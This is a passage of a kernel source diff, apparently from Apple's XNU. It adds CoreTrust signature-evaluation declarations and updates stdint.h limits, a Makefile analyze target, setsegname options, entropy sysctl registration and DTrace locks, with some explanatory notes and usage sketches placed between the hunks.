+                              CTBAAIdentity *identity);                         // Output from identity field in leaf certificate
+
+int CTEvaluateBAASystemTestRoot(const uint8_t *certsData, size_t certsLen,      // Input: binary representation of exactly 3 concatenated
+                                                                                //        DER-encoded certs, with leaf first
+                                const uint8_t *rootKeyData, size_t rootKeyLen,  // Input: Root public key, if not specified production root will be used
+                                const uint8_t **leafKeyData, size_t *leafKeyLen,// Output: points to the leaf key data in the input certsData
+                                CTBAAIdentity *identity);                       // Output from identity field in leaf certificate
+
+int CTEvaluateBAAUser(const uint8_t *certsData, size_t certsLen,        // Input: binary representation of exactly 3 concatenated
+                                                                        //        DER-encoded certs, with leaf first
+                      const uint8_t **leafKeyData, size_t *leafKeyLen,  // Output: points to the leaf key data in the input certsData
+                      CTBAAIdentity *identity);                         // Output from identity field in leaf certificate
+
+int CTEvaluateBAAUserTestRoot(const uint8_t *certsData, size_t certsLen,        // Input: binary representation of exactly 3 concatenated
+                                                                                //        DER-encoded certs, with leaf first
+                              const uint8_t *rootKeyData, size_t rootKeyLen,    // Input: Root public key, if not specified production root will be used
+                              const uint8_t **leafKeyData, size_t *leafKeyLen,  // Output: points to the leaf key data in the input certsData
+                              CTBAAIdentity *identity);                         // Output from identity field in leaf certificate
+
+int CTEvaluateSatori(const uint8_t *certsData, size_t certsLen,         // Input: binary (DER) representation of 3 concatenated certs
+                                                                        //        with leaf first
+                     bool allowTestRoot,                                // Input: whether to allow the Test Apple Roots
+                     const uint8_t **leafKeyData, size_t *leafKeyLen);  // Output: points to the leaf key data in the input certsData
+
+int CTEvaluatePragueSignatureCMS(const uint8_t *cmsData, size_t cmsLen,                 // Input: CMS signature blob
+                                 const uint8_t *detachedData, size_t detachedDataLen,   // Input: data signed by CMS blob
+                                 bool allowTestRoot,                                    // Input: permit use of test hierarchy
+                                 const uint8_t **leafKeyData, size_t *leafKeyLen);      // Output: points to leaf key data in input cmsData
+
+int CTEvaluateKDLSignatureCMS(const uint8_t *cmsData, size_t cmsLen,                    // Input: CMS signature blob
+                              const uint8_t *detachedData, size_t detachedDataLen,      // Input: data signed by CMS blob
+                              bool allowTestRoot,                                       // Input: permit use of test hierarchy
+                              const uint8_t **leafKeyData, size_t *leafKeyLen);         // Output: points to leaf key data in input cmsData
+
+typedef uint64_t CoreTrustPolicyFlags;
+enum {
+    CORETRUST_POLICY_BASIC =                0,
+    CORETRUST_POLICY_SAVAGE_DEV =           1 << 0,
+    CORETRUST_POLICY_SAVAGE_PROD =          1 << 1,
+    CORETRUST_POLICY_MFI_AUTHV3 =           1 << 2,
+    CORETRUST_POLICY_MAC_PLATFORM =         1 << 3,
+    CORETRUST_POLICY_MAC_DEVELOPER =        1 << 4,
+    CORETRUST_POLICY_DEVELOPER_ID =         1 << 5,
+    CORETRUST_POLICY_MAC_APP_STORE =        1 << 6,
+    CORETRUST_POLICY_IPHONE_DEVELOPER =     1 << 7,
+    CORETRUST_POLICY_IPHONE_APP_PROD =      1 << 8,
+    CORETRUST_POLICY_IPHONE_APP_DEV =       1 << 9,
+    CORETRUST_POLICY_IPHONE_VPN_PROD =      1 << 10,
+    CORETRUST_POLICY_IPHONE_VPN_DEV =       1 << 11,
+    CORETRUST_POLICY_TVOS_APP_PROD =        1 << 12,
+    CORETRUST_POLICY_TVOS_APP_DEV =         1 << 13,
+    CORETRUST_POLICY_TEST_FLIGHT_PROD =     1 << 14,
+    CORETRUST_POLICY_TEST_FLIGHT_DEV =      1 << 15,
+    CORETRUST_POLICY_IPHONE_DISTRIBUTION =  1 << 16,
+    CORETRUST_POLICY_MAC_SUBMISSION =       1 << 17,
+    CORETRUST_POLICY_YONKERS_DEV =          1 << 18,
+    CORETRUST_POLICY_YONKERS_PROD =         1 << 19,
+    CORETRUST_POLICY_MAC_PLATFORM_G2 =      1 << 20,
+    CORETRUST_POLICY_ACRT =                 1 << 21,
+    CORETRUST_POLICY_SATORI =               1 << 22,
+    CORETRUST_POLICY_BAA =                  1 << 23,
+    CORETRUST_POLICY_UCRT =                 1 << 24,
+    CORETRUST_POLICY_PRAGUE =               1 << 25,
+    CORETRUST_POLICY_KDL =                  1 << 26,
+    CORETRUST_POLICY_MFI_AUTHV2 =           1 << 27,
+    CORETRUST_POLICY_MFI_SW_AUTH_PROD =     1 << 28,
+    CORETRUST_POLICY_MFI_SW_AUTH_DEV =      1 << 29,
+    CORETRUST_POLICY_COMPONENT =            1 << 30,
+    CORETRUST_POLICY_IMG4 =                 1ULL << 31,
+    CORETRUST_POLICY_SERVER_AUTH =          1ULL << 32,
+    CORETRUST_POLICY_SERVER_AUTH_STRING =   1ULL << 33,
+};
+
+typedef uint32_t CoreTrustDigestType;
+enum {
+    CORETRUST_DIGEST_TYPE_SHA1 = 1,
+    CORETRUST_DIGEST_TYPE_SHA224 = 2,
+    CORETRUST_DIGEST_TYPE_SHA256 = 4,
+    CORETRUST_DIGEST_TYPE_SHA384 = 8,
+    CORETRUST_DIGEST_TYPE_SHA512 = 16
+};
+
+int CTEvaluateAMFICodeSignatureCMS(const uint8_t *cmsData, size_t cmsLen,                   // Input: CMS blob
+                                   const uint8_t *detachedData, size_t detachedDataLen,     // Input: data signed by CMS blob
+                                   bool allow_test_hierarchy,                               // Input: permit use of test hierarchy
+                                   const uint8_t **leafCert, size_t *leafCertLen,           // Output: signing certificate
+                                   CoreTrustPolicyFlags *policyFlags,                       // Output: policy met by signing certificate
+                                   CoreTrustDigestType *cmsDigestType,                      // Output: digest used to sign the CMS blob
+                                   CoreTrustDigestType *hashAgilityDigestType,              // Output: highest strength digest type
+                                                                                            //          from hash agility attribute
+                                   const uint8_t **digestData, size_t *digestLen);          // Output: pointer to hash agility value
+                                                                                            //          in CMS blob (with digest type above)
+/* Returns non-zero if there's a standards-based problem with the CMS or certificates.
+ * Policy matching of the certificates is only reflected in the policyFlags output. Namely, if the only problem is that
+ * the certificates don't match a policy, the returned integer will be 0 (success) and the policyFlags will be 0 (no matching policies).
+ * Some notes about hash agility outputs:
+ *  - hashAgilityDigestType is only non-zero for HashAgilityV2
+ *  - If hashAgilityDigestType is non-zero, digestData/Len provides the digest value
+ *  - If hashAgilityDigestType is zero, digestData/Len provides the content of the HashAgilityV1 attribute (if present)
+ *  - If neither HashAgilityV1 nor HashAgilityV2 attributes are found, these outputs will all be NULL.
+ */
+
+int CTParseAccessoryCerts(const uint8_t *certsData, size_t certsLen,                    // Input: CMS or binary representation of DER-encoded certs
+                                  const uint8_t **leafCertData, size_t *leafCertLen,    // Output: points to leaf cert data in input certsData
+                                  const uint8_t **subCACertData, size_t *subCACertLen,  // Output: points to subCA cert data (1st of 2) in input certsData, if present. Is set to NULL if only one cert present in input.
+                                  CoreTrustPolicyFlags *flags);                         // Output: policy flags set by this leaf
+
+
+int CTEvaluateAccessoryCert(const uint8_t *leafCertData, size_t leafCertLen,            // Input: binary representation of DER-encoded leaf cert
+                            const uint8_t *subCACertData, size_t subCACertLen,          // Input: (optional) binary representation of DER-encoded subCA cert
+                            const uint8_t *anchorCertData, size_t anchorCertLen,        // Input: binary representation of DER-encoded anchor cert
+                            CoreTrustPolicyFlags policy,                                // Input: policy to use when evaluating chain
+                            const uint8_t **leafKeyData, size_t *leafKeyLen,            // Output: points to the leaf key data in the input leafCertData
+                            const uint8_t **extensionValueData, size_t *extensionValueLen); // Output: points to the extension value in the input leafCertData
+/* Which extension value is returned is based on which policy the cert was verified against:
+ *  - For MFI AuthV3, this is the value of the extension with OID 1.2.840.113635.100.6.36
+ *  - For SW Auth, this is the value of the extension with OID 1.2.840.113635.100.6.59.1 (GeneralCapabilities extension)
+ *  - For Component certs, this is the value of the extension with OID 1.2.840.113635.100.11.1 (Component Type)
+ *
+ * The following CoreTrustPolicyFlags are accepted:
+ *  - CORETRUST_POLICY_BASIC
+ *  - CORETRUST_POLICY_MFI_AUTHV2
+ *  - CORETRUST_POLICY_MFI_AUTHV3
+ *  - CORETRUST_POLICY_MFI_SW_AUTH_DEV
+ *  - CORETRUST_POLICY_MFI_SW_AUTH_PROD
+ *  - CORETRUST_POLICY_COMPONENT
+ */
+
+int CTEvaluateAppleSSL(const uint8_t *certsData, size_t certsLen,           // Input: binary representation of up to 3 concatenated
+                                                                            //        DER-encoded certificates, with leaf first
+                       const uint8_t *hostnameData, size_t hostnameLen,     // Input: The hostname of the TLS server being connected to
+                       uint64_t leafMarker,                                 // Input: The last decimal of the marker OID for this project
+                                                                            //        (e.g. 32 for 1.2.840.113635.100.6.27.32)
+                       bool allowTestRoots);                                // Input: permit use of test hierarchy
+
+int CTEvaluateAppleSSLWithOptionalTemporalCheck(const uint8_t *certsData, size_t certsLen,
+                                                 const uint8_t *hostnameData, size_t hostnameLen,
+                                                 uint64_t leafMarker,
+                                                 bool allowTestRoots,
+                                                 bool checkTemporalValidity);
+
+__END_DECLS
+
+#endif /* _CORETRUST_EVALUATE_H_ */
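
The comment block above describes how CTEvaluateAMFICodeSignatureCMS reports results: a non-zero return only for standards-level problems, with policy matching reported solely through the flags output. Below is a minimal sketch of a caller that follows those rules; the function name check_signature, the buffer sources, and the include path are illustrative assumptions, not how AMFI in this commit actually wires it up.

#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <coretrust/CTEvaluate.h>   /* assumed install path for the header added above */

/* Hypothetical caller: cms/cmsLen hold a CMS signature blob, detached/detachedLen
 * hold the data it signs (e.g. a code directory), both obtained elsewhere. */
static int
check_signature(const uint8_t *cms, size_t cmsLen,
    const uint8_t *detached, size_t detachedLen)
{
    const uint8_t *leafCert = NULL;
    size_t leafCertLen = 0;
    CoreTrustPolicyFlags policy = 0;
    CoreTrustDigestType cmsDigest = 0;
    CoreTrustDigestType agilityDigest = 0;
    const uint8_t *agilityDigestData = NULL;
    size_t agilityDigestLen = 0;

    /* Non-zero only for structural problems with the CMS or certificates. */
    int err = CTEvaluateAMFICodeSignatureCMS(cms, cmsLen, detached, detachedLen,
        false /* do not allow the test hierarchy */,
        &leafCert, &leafCertLen, &policy, &cmsDigest, &agilityDigest,
        &agilityDigestData, &agilityDigestLen);
    if (err != 0) {
        return err;
    }
    /* Success with no flags set means the chain verified but matched no policy. */
    if (policy == CORETRUST_POLICY_BASIC) {
        return -1;
    }
    return 0;
}
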
diff --git a/EXTERNAL_HEADERS/stdint.h b/EXTERNAL_HEADERS/stdint.h
index 9d86e8a623bf4f35fffe2affa629f02013b06f89..19ac69fb0f4cc70b58c01630269fecb2d2c3708e 100644 (file)
@@ -60,12 +60,51 @@ typedef uint64_t        uint_fast64_t;
 
 
 /* 7.18.1.5 Greatest-width integer types */
-typedef long long                intmax_t;
-typedef unsigned long long      uintmax_t;
+#ifdef __INTMAX_TYPE__
+typedef __INTMAX_TYPE__ intmax_t;
+#else
+#ifdef __LP64__
+typedef long int intmax_t;
+#else
+typedef long long int intmax_t;
+#endif /* __LP64__ */
+#endif /* __INTMAX_TYPE__ */
+#ifdef __UINTMAX_TYPE__
+typedef __UINTMAX_TYPE__ uintmax_t;
+#else
+#ifdef __LP64__
+typedef long unsigned int uintmax_t;
+#else
+typedef long long unsigned int uintmax_t;
+#endif /* __LP64__ */
+#endif /* __UINTMAX_TYPE__ */
+
+/* 7.18.4 Macros for integer constants */
+#define INT8_C(v)    (v)
+#define INT16_C(v)   (v)
+#define INT32_C(v)   (v)
+#define INT64_C(v)   (v ## LL)
+
+#define UINT8_C(v)   (v)
+#define UINT16_C(v)  (v)
+#define UINT32_C(v)  (v ## U)
+#define UINT64_C(v)  (v ## ULL)
+
+#ifdef __LP64__
+#define INTMAX_C(v)  (v ## L)
+#define UINTMAX_C(v) (v ## UL)
+#else
+#define INTMAX_C(v)  (v ## LL)
+#define UINTMAX_C(v) (v ## ULL)
+#endif
 
 /* 7.18.2 Limits of specified-width integer types:
  *   These #defines specify the minimum and maximum limits
  *   of each of the types declared above.
+ *
+ *   They must have "the same type as would an expression that is an
+ *   object of the corresponding type converted according to the integer
+ *   promotion".
  */
 
 
@@ -126,43 +165,33 @@ typedef unsigned long long      uintmax_t;
 /* 7.18.2.4 Limits of integer types capable of holding object pointers */
 
 #if __WORDSIZE == 64
-#define INTPTR_MIN       INT64_MIN
-#define INTPTR_MAX       INT64_MAX
+#define INTPTR_MAX        9223372036854775807L
 #else
-#define INTPTR_MIN        INT32_MIN
-#define INTPTR_MAX        INT32_MAX
+#define INTPTR_MAX        2147483647L
 #endif
+#define INTPTR_MIN        (-INTPTR_MAX-1)
 
 #if __WORDSIZE == 64
-#define UINTPTR_MAX      UINT64_MAX
+#define UINTPTR_MAX       18446744073709551615UL
 #else
-#define UINTPTR_MAX       UINT32_MAX
+#define UINTPTR_MAX       4294967295UL
 #endif
 
 /* 7.18.2.5 Limits of greatest-width integer types */
-#define INTMAX_MIN        INT64_MIN
-#define INTMAX_MAX        INT64_MAX
-
-#define UINTMAX_MAX       UINT64_MAX
+#define INTMAX_MAX        INTMAX_C(9223372036854775807)
+#define UINTMAX_MAX       UINTMAX_C(18446744073709551615)
+#define INTMAX_MIN        (-INTMAX_MAX-1)
 
 /* 7.18.3 "Other" */
 #if __WORDSIZE == 64
-#define PTRDIFF_MIN      INT64_MIN
-#define PTRDIFF_MAX      INT64_MAX
+#define PTRDIFF_MIN      INTMAX_MIN
+#define PTRDIFF_MAX      INTMAX_MAX
 #else
 #define PTRDIFF_MIN       INT32_MIN
 #define PTRDIFF_MAX       INT32_MAX
 #endif
 
-/* We have no sig_atomic_t yet, so no SIG_ATOMIC_{MIN,MAX}.
-   Should end up being {-127,127} or {0,255} ... or bigger.
-   My bet would be on one of {U}INT32_{MIN,MAX}. */
-
-#if __WORDSIZE == 64
-#define SIZE_MAX         UINT64_MAX
-#else
-#define SIZE_MAX          UINT32_MAX
-#endif
+#define SIZE_MAX          UINTPTR_MAX
 
 #if defined(__STDC_WANT_LIB_EXT1__) && __STDC_WANT_LIB_EXT1__ >= 1
 #define RSIZE_MAX         (SIZE_MAX >> 1)
@@ -194,20 +223,6 @@ typedef unsigned long long      uintmax_t;
 #define SIG_ATOMIC_MIN   INT32_MIN
 #define SIG_ATOMIC_MAX   INT32_MAX
 
-/* 7.18.4 Macros for integer constants */
-#define INT8_C(v)    (v)
-#define INT16_C(v)   (v)
-#define INT32_C(v)   (v)
-#define INT64_C(v)   (v ## LL)
-
-#define UINT8_C(v)   (v ## U)
-#define UINT16_C(v)  (v ## U)
-#define UINT32_C(v)  (v ## U)
-#define UINT64_C(v)  (v ## ULL)
-
-#define INTMAX_C(v)  (v ## LL)
-#define UINTMAX_C(v) (v ## ULL)
-
 #endif /* KERNEL */
 
 #endif /* _KERNEL_STDINT_H_ */
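
The rewritten limits follow the requirement quoted in the comment: each limit macro must have the same type as the corresponding typedef after integer promotion. That is why INTMAX_MAX is now built from INTMAX_C() (an L suffix on LP64, LL otherwise) and INTPTR_MIN is spelled (-INTPTR_MAX-1) rather than as a bare positive literal. A small host-side sketch, assuming a C11 compiler and an LP64 target whose <stdint.h> obeys the same rule, that checks the property:

#include <stdint.h>

/* Each limit must carry exactly the type of its typedef: on LP64 intmax_t is
 * long, so INTMAX_MAX needs an L (not LL) suffix, and INTPTR_MIN is written
 * as (-INTPTR_MAX - 1) because the positive value 2^63 would not fit the type. */
_Static_assert(_Generic(INTMAX_MAX, intmax_t: 1, default: 0),
    "INTMAX_MAX has type intmax_t");
_Static_assert(_Generic(INTPTR_MIN, intptr_t: 1, default: 0),
    "INTPTR_MIN has type intptr_t");
_Static_assert(_Generic(SIZE_MAX, size_t: 1, default: 0),
    "SIZE_MAX has type size_t");
_Static_assert(INTMAX_MIN == -INTMAX_MAX - 1, "two's complement minimum");
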
index 8b1e30f654286e49c82164e05d236cf4554f3ceb..9b62aadb1fd8ff819fadf2ee3524ba6f166f3c54 100644 (file)
--- a/Makefile
+++ b/Makefile
@@ -318,6 +318,8 @@ xnu_tests_driverkit:
                SRCROOT=$(SRCROOT)/tests/driverkit
 
 
+include $(MakeInc_cmd)
+
 #
 # The "analyze" target defined below invokes Clang Static Analyzer
 # with a predefined set of checks and options for the project.
@@ -339,16 +341,18 @@ STATIC_ANALYZER_TARGET ?=
 STATIC_ANALYZER_EXTRA_FLAGS ?=
 
 analyze:
-       # This is where the reports are going to be available.
-       # Old reports are deleted on make clean only.
-       mkdir -p $(STATIC_ANALYZER_OUTPUT_DIR)
-
-       # Recursively build the requested target under scan-build.
-       # Exclude checks that weren't deemed to be security critical,
-       # like null pointer dereferences.
-       xcrun scan-build -o $(STATIC_ANALYZER_OUTPUT_DIR) \
+# This is where the reports are going to be available.
+# Old reports are deleted on make clean only.
+       $(_v)$(MKDIR) $(STATIC_ANALYZER_OUTPUT_DIR)
+
+# Recursively build the requested target under scan-build.
+# Exclude checks that weren't deemed to be security critical,
+# like null pointer dereferences.
+       $(_v)$(XCRUN) $(SCAN_BUILD) -o $(STATIC_ANALYZER_OUTPUT_DIR) \
                -disable-checker deadcode.DeadStores \
                -disable-checker core.NullDereference \
                -disable-checker core.DivideZero \
                $(STATIC_ANALYZER_EXTRA_FLAGS) \
-               make $(STATIC_ANALYZER_TARGET)
+               $(MAKE) $(STATIC_ANALYZER_TARGET) QUIET=1 2>&1 | $(GREP) "^scan-build:"
+
+.PHONY: analyze
diff --git a/SETUP/setsegname/setsegname.c b/SETUP/setsegname/setsegname.c
index bd15b00256c2431d0be719b50e40cf1f2ce8f82e..a0d5d3bc3fc01b7d05b162f7534e08a28920e653 100644 (file)
@@ -107,7 +107,7 @@ readFile(const char *path, vm_offset_t * objAddr, vm_size_t * objSize)
 static void
 usage(void)
 {
-       fprintf(stderr, "Usage: %s [-s OLDSEGNAME] -n NEWSEGNAME input -o output\n", getprogname());
+       fprintf(stderr, "Usage: %s [-s OLDSEGNAME] [-i IGNORESEGNAME] -n NEWSEGNAME input -o output\n", getprogname());
        exit(1);
 }
 
@@ -120,6 +120,7 @@ main(int argc, char * argv[])
        const char            * output_name = NULL;
        const char            * input_name = NULL;
        const char            * oldseg_name = NULL;
+       const char            * ignoreseg_name = NULL;
        const char            * newseg_name = NULL;
        struct mach_header    * hdr;
        struct mach_header_64 * hdr64;
@@ -137,11 +138,14 @@ main(int argc, char * argv[])
        int                     ch;
 
 
-       while ((ch = getopt(argc, argv, "s:n:o:")) != -1) {
+       while ((ch = getopt(argc, argv, "s:i:n:o:")) != -1) {
                switch (ch) {
                case 's':
                        oldseg_name = optarg;
                        break;
+               case 'i':
+                       ignoreseg_name = optarg;
+                       break;
                case 'n':
                        newseg_name = optarg;
                        break;
@@ -234,7 +238,8 @@ main(int argc, char * argv[])
                                attr = OSSwapInt32(attr);
                        }
 
-                       if (!(S_ATTR_DEBUG & attr)) {
+                       if (!(S_ATTR_DEBUG & attr) && (!ignoreseg_name ||
+                           0 != strncmp(ignoreseg_name, (char *)names, sizeof(*names)))) {
                                if (!oldseg_name ||
                                    0 == strncmp(oldseg_name, (char *)names, sizeof(*names))) {
                                        memset(names, 0x0, sizeof(*names));
diff --git a/bsd/arm/vmparam.h b/bsd/arm/vmparam.h
index 085f1396819a9ce78112dbd84bb5b2103ff0292a..ce69fd9cd8738e8f2fb6b4a0e0077e889a6decb0 100644 (file)
@@ -26,7 +26,7 @@
 #ifndef DFLSSIZ
 /* XXX stack size default is a platform property: use getrlimit(2) */
 #if (defined(TARGET_OS_OSX) && (TARGET_OS_OSX != 0)) || \
-        (defined(KERNEL) && !defined(CONFIG_EMBEDDED) || (CONFIG_EMBEDDED == 0))
+        (defined(KERNEL) && XNU_TARGET_OS_OSX)
 #define DFLSSIZ         (8*1024*1024 - 16*1024)
 #else
 #define DFLSSIZ         (1024*1024 - 16*1024)   /* initial stack size limit */
@@ -35,7 +35,7 @@
 #ifndef MAXSSIZ
 /* XXX stack size limit is a platform property: use getrlimit(2) */
 #if (defined(TARGET_OS_OSX) && (TARGET_OS_OSX != 0)) || \
-        (defined(KERNEL) && !defined(CONFIG_EMBEDDED) || (CONFIG_EMBEDDED == 0))
+        (defined(KERNEL) && XNU_TARGET_OS_OSX)
 #define MAXSSIZ         (64*1024*1024)          /* max stack size */
 #else
 #define MAXSSIZ         (1024*1024)             /* max stack size */
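
The XXX comments in both hunks direct user code to getrlimit(2) rather than to these kernel-internal defaults. A minimal user-space sketch of that query, purely illustrative and not part of this commit:

#include <stdio.h>
#include <sys/resource.h>

int
main(void)
{
    struct rlimit rl;

    /* RLIMIT_STACK reports the current (soft) and maximum (hard) stack size
     * limits; DFLSSIZ/MAXSSIZ above are only the kernel's platform defaults. */
    if (getrlimit(RLIMIT_STACK, &rl) != 0) {
        perror("getrlimit");
        return 1;
    }
    printf("stack soft limit: %llu bytes\n", (unsigned long long)rl.rlim_cur);
    printf("stack hard limit: %llu bytes\n", (unsigned long long)rl.rlim_max);
    return 0;
}
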
diff --git a/bsd/conf/files b/bsd/conf/files
index f151c7312ab1a5d179dc273f36f8d0d4c93c2d02..7971787ee73ee672aff35c769718ebf621baad9e 100644 (file)
@@ -167,6 +167,7 @@ bsd/vfs/vfs_conf.c                  standard
 bsd/vfs/vfs_conf.c                     optional config_nfs4
 bsd/vfs/vfs_fslog.c                    standard
 bsd/vfs/vfs_init.c                     standard
+bsd/vfs/vfs_io_compression_stats.c     optional config_io_compression_stats
 bsd/vfs/vfs_lookup.c                   standard
 bsd/vfs/vfs_quota.c                    optional quota
 bsd/vfs/vfs_subr.c                     standard
@@ -457,6 +458,7 @@ bsd/kern/subr_log.c                 standard
 bsd/kern/subr_prf.c                    standard
 bsd/kern/subr_sbuf.c                   standard
 bsd/kern/subr_xxx.c                    standard
+bsd/kern/counter_test.c                        optional development
 bsd/kern/sys_eventlink.c               standard
 bsd/kern/sys_generic.c                 standard
 bsd/kern/sys_pipe.c                    standard
diff --git a/bsd/crypto/entropy/Makefile b/bsd/crypto/entropy/Makefile
index 2d1197ce747ef90d49c48bec522cacbacd37ebed..2ff49f54b6f7eb4a6cd19cedb738073edc054f31 100644 (file)
@@ -6,9 +6,6 @@ export MakeInc_dir=${SRCROOT}/makedefs/MakeInc.dir
 include $(MakeInc_cmd)
 include $(MakeInc_def)
 
-DATAFILES = \
-       entropy_sysctl.h
-
 INSTALL_MI_LIST =
 
 EXPORT_MI_LIST = ${DATAFILES}
diff --git a/bsd/crypto/entropy/entropy_sysctl.c b/bsd/crypto/entropy/entropy_sysctl.c
index 39502f7b9fc8c5b610fcbeed83859a64ae3020d6..73580d77b871160f4d7aad45f3643a3ff2a84ce8 100644 (file)
@@ -27,9 +27,9 @@
  */
 
 #include <sys/sysctl.h>
+#include <pexpert/pexpert.h>
 #include <kern/zalloc.h>
 #include <kern/percpu.h>
-#include <crypto/entropy/entropy_sysctl.h>
 #include <prng/entropy.h>
 #include <libkern/section_keywords.h>
 
@@ -49,7 +49,7 @@ SYSCTL_UINT(_kern_entropy_health_adaptive_proportion_test, OID_AUTO, failure_cou
 SYSCTL_UINT(_kern_entropy_health_adaptive_proportion_test, OID_AUTO, max_observation_count, CTLFLAG_RD, &entropy_health_apt_stats.max_observation_count, 0, NULL);
 
 static int
-sysctl_entropy_collect(__unused struct sysctl_oid *oidp, __unused void *arg1, __unused int arg2, struct sysctl_req *req)
+sysctl_entropy_collect SYSCTL_HANDLER_ARGS
 {
        if (!req->oldptr || req->oldlen > entropy_analysis_buffer_size) {
                return EINVAL;
@@ -61,11 +61,21 @@ sysctl_entropy_collect(__unused struct sysctl_oid *oidp, __unused void *arg1, __
 // Get current size of entropy buffer in bytes
 SYSCTL_UINT(_kern_entropy, OID_AUTO, entropy_buffer_size, CTLFLAG_RD | CTLFLAG_MASKED | CTLFLAG_NOAUTO, &entropy_analysis_buffer_size, 0, NULL);
 // Collect contents from entropy buffer
-SYSCTL_PROC(_kern_entropy, OID_AUTO, entropy_collect, CTLTYPE_OPAQUE | CTLFLAG_RD | CTLFLAG_MASKED | CTLFLAG_NOAUTO, NULL, 0, sysctl_entropy_collect, "-", NULL);
+SYSCTL_PROC(_kern_entropy, OID_AUTO, entropy_collect,
+    CTLTYPE_OPAQUE | CTLFLAG_RD | CTLFLAG_MASKED | CTLFLAG_NOAUTO,
+    NULL, 0, sysctl_entropy_collect, "-", NULL);
 
-void
-entropy_analysis_register_sysctls(void)
+__startup_func
+static void
+entropy_analysis_sysctl_startup(void)
 {
-       sysctl_register_oid(&sysctl__kern_entropy_entropy_buffer_size);
-       sysctl_register_oid(&sysctl__kern_entropy_entropy_collect);
+       uint32_t sample_count = 0;
+       if (__improbable(PE_parse_boot_argn("entropy-analysis-sample-count", &sample_count, sizeof(sample_count)))) {
+               sysctl_register_oid_early(&sysctl__kern_entropy_entropy_buffer_size);
+               sysctl_register_oid_early(&sysctl__kern_entropy_entropy_collect);
+       } else if (__improbable(PE_parse_boot_argn("ebsz", &sample_count, sizeof(sample_count)))) {
+               sysctl_register_oid_early(&sysctl__kern_entropy_entropy_buffer_size);
+               sysctl_register_oid_early(&sysctl__kern_entropy_entropy_collect);
+       }
 }
+STARTUP(SYSCTL, STARTUP_RANK_MIDDLE, entropy_analysis_sysctl_startup);
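
The registration above is gated on a boot-arg and the OIDs are marked CTLFLAG_MASKED | CTLFLAG_NOAUTO, so they exist only on entropy-analysis boots. A hedged user-space sketch of how an offline analysis tool might read them back once the boot-arg is set; the tool itself is an assumption, only the sysctl names come from the registrations above.

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <sys/sysctl.h>

int
main(void)
{
    /* kern.entropy.entropy_buffer_size reports the sample buffer size in bytes. */
    unsigned int bufsize = 0;
    size_t len = sizeof(bufsize);
    if (sysctlbyname("kern.entropy.entropy_buffer_size", &bufsize, &len, NULL, 0) != 0) {
        perror("entropy_buffer_size");   /* boot-arg not set, OID not registered */
        return 1;
    }

    /* kern.entropy.entropy_collect rejects requests larger than the buffer size. */
    uint8_t *buf = malloc(bufsize);
    if (buf == NULL) {
        return 1;
    }
    size_t buflen = bufsize;
    if (sysctlbyname("kern.entropy.entropy_collect", buf, &buflen, NULL, 0) != 0) {
        perror("entropy_collect");
        free(buf);
        return 1;
    }
    printf("collected %zu bytes of raw entropy samples\n", buflen);
    free(buf);
    return 0;
}
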
diff --git a/bsd/crypto/entropy/entropy_sysctl.h b/bsd/crypto/entropy/entropy_sysctl.h
deleted file mode 100644 (file)
index 4e957fb..0000000
--- a/bsd/crypto/entropy/entropy_sysctl.h
+++ /dev/null
@@ -1,42 +0,0 @@
-/*
- * Copyright (c) 2019 Apple Inc. All rights reserved.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. The rights granted to you under the License
- * may not be used to create, or enable the creation or redistribution of,
- * unlawful or unlicensed copies of an Apple operating system, or to
- * circumvent, violate, or enable the circumvention or violation of, any
- * terms of an Apple operating system software license agreement.
- *
- * Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
- */
-
-#ifndef _SYS_CRYPTO_ENTROPY_ENTROPYSYSCTL_H_
-#define _SYS_CRYPTO_ENTROPY_ENTROPYSYSCTL_H_
-
-// This function is used only for test purposes. We collect a large
-// number of entropy samples during boot and analyze them offline.
-//
-// See entropy.c to understand the initialization of this module via
-// boot arg and the collection of the samples.
-//
-// See entropy_sysctl.c to understand the semantics of the sysctl
-// that exposes the samples for analysis.
-void entropy_analysis_register_sysctls(void);
-
-#endif
diff --git a/bsd/dev/arm/dtrace_isa.c b/bsd/dev/arm/dtrace_isa.c
index c77f08a640aa6caff06f20aa59995be3dd300ad8..0802551bc92a505c41043b332c22e524a19517ee 100644 (file)
@@ -55,9 +55,6 @@ extern struct arm_saved_state *find_kern_regs(thread_t);
 extern dtrace_id_t      dtrace_probeid_error;   /* special ERROR probe */
 typedef arm_saved_state_t savearea_t;
 
-extern lck_attr_t       *dtrace_lck_attr;
-extern lck_grp_t        *dtrace_lck_grp;
-
 int dtrace_arm_condition_true(int condition, int cpsr);
 
 /*
@@ -94,7 +91,7 @@ dtrace_getipl(void)
  * MP coordination
  */
 
-decl_lck_mtx_data(static, dt_xc_lock);
+static LCK_MTX_DECLARE_ATTR(dt_xc_lock, &dtrace_lck_grp, &dtrace_lck_attr);
 static uint32_t dt_xc_sync;
 
 typedef struct xcArg {
@@ -138,16 +135,6 @@ dtrace_xcall(processorid_t cpu, dtrace_xcall_t f, void *arg)
        return;
 }
 
-/*
- * Initialization
- */
-void
-dtrace_isa_init(void)
-{
-       lck_mtx_init(&dt_xc_lock, dtrace_lck_grp, dtrace_lck_attr);
-       return;
-}
-
 /*
  * Runtime and ABI
  */
diff --git a/bsd/dev/arm/munge.c b/bsd/dev/arm/munge.c
index af050d7ee4117c61ec8c5e0a8a559fdb5df8153a..fe18d66ccdd2ba2b139b4f15b2adf9683a4fa7ad 100644 (file)
@@ -64,7 +64,7 @@ typedef enum {
 
 /*
  * We start 32 bytes after sp since 4 registers are pushed onto the stack
- * in the userspace syscall handler, and the first 4 stack argumnets are moved
+ * in the userspace syscall handler, and the first 4 stack arguments are moved
  * into registers already
  */
 #define ARG_SP_BYTE_OFFSET                         32
diff --git a/bsd/dev/arm/stubs.c b/bsd/dev/arm/stubs.c
